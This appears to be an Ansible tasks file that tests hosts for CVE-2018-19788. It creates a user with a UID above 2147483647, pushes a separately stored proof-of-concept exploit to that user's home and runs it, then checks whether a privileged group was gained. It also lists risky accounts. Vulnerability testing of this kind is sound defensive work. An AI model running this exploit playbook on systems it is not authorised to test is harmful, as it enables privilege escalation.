---
# tasks file for CVE-2018-19788

- name: Provision a unprivileged user with UID greater than 2147483647
  block:
  - name: Add the test account
    user:
      name: "{{ CVE_2018_19788_test_user }}"
      comment: Test for CVE-2018-19788
      shell: /bin/bash
      uid: "{{ CVE_2018_19788_test_user_uid }}"

- name: Exploit the CVE-2018-19788
  block:
  - name: Push the exploit code
    copy:
      src: ./{{ CVE_2018_19788_poc_exploit_file }}
      dest: $HOME/{{ CVE_2018_19788_poc_exploit_file }}
      owner: "{{ CVE_2018_19788_test_user }}"
      group: "{{ CVE_2018_19788_test_user }}"
      mode: 0750

  - name: Execute the exploit code
    shell: ./"{{ CVE_2018_19788_poc_exploit_file }}"
    args:
      chdir: $HOME/
    tags:
      - skip_ansible_lint

  - name: Produce the output of the PoC
    command: groups
    register: CVE_2018_19788_exploit_poc

  rescue:
  - name: Rollback
    debug:
      msg: Something went wrong, or your system is not vulnerable

  become: True
  become_user: "{{ CVE_2018_19788_test_user }}"

- name: PoC
  block:
  - name: Display the PoC
    debug:
      msg: "{{ CVE_2018_19788_exploit_poc }}"

  - name: Verify that the exploit outcome
    assert:
      that:
        - "'{{ CVE_2018_19788_privileged_group }}' in CVE_2018_19788_exploit_poc.stdout"
      success_msg: "The host {{ ansible_host }} is vunerable to the CVE-2018-19788"
      fail_msg: "{{ ansible_host }} is not vunerable to the CVE-2018-19788"
    when: CVE_2018_19788_exploit_poc.stdout is defined

  when: CVE_2018_19788_exploit_poc is defined

- name: Remove the unprivileged user provisioned for testing purposes
  user:
    name: "{{ CVE_2018_19788_test_user }}"
    state: absent
    remove: Yes
    uid: "{{ CVE_2018_19788_test_user_uid }}"
  when: CVE_2018_19788_remove_test_user

- name: Display a list of potentially leveragable users
  block:
  - name: List the users with uid equal or greater than 2147483647
    shell: "getent passwd | awk -F: '$3 >= 2147483647 {print $1}'"
    changed_when: No
    register: users_list
    tags:
      - skip_ansible_lint

  - name: Verify that the exploit outcome
    assert:
      that:
        - "users_list.stdout_lines == []"
      success_msg: "No potentially dangerous users are present on the system"
      fail_msg: "{{ users_list.stdout_lines | to_nice_json }}"
    ignore_errors: Yes
    when: users_list is defined

  when: CVE_2018_19788_list_explotable_users